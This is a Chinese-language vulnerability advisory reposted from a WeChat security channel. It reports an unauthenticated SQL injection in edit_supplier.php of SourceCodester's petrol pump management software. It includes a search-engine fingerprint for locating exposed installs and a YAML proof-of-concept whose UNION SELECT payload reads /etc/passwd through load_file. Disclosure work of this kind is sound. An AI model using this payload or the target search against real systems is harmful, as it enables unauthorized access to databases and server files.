SourceCodester 汽油泵管理软件 edit_supplier SQL 注入漏洞

admin 2024年5月25日00:20:21评论13 views字数 419阅读1分23秒阅读模式
 

漏洞介绍

SOURCECODESTER / 汽油泵管理软件 - edit_supplier.php 存在未经身份验证的 SQL 注入,攻击者可利用该漏洞获取数据库敏感信息。

影响版本

SourceCodester
漏洞情报

搜索引擎语法

app="SourceCodester"

POC

name: poc-yaml-sqllevel: 2finger: ''rules:  - method: POST    path: /admin/edit_supplier.php    body: id=1'+UNION+SELECT+1,load_file('/etc/passwd'),3,4,version(),6,7--+-    expression: |      response.status == 200detail:  author: ''  tvul_id: .nan
修复建议

联系厂商获取加固建议

原文始发于微信公众号(极星信安):安全情报,SourceCodester 汽油泵管理软件 edit_supplier SQL 注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月25日00:20:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SourceCodester 汽油泵管理软件 edit_supplier SQL 注入漏洞https://cn-sec.com/archives/2770284.html

发表评论

匿名网友 填写信息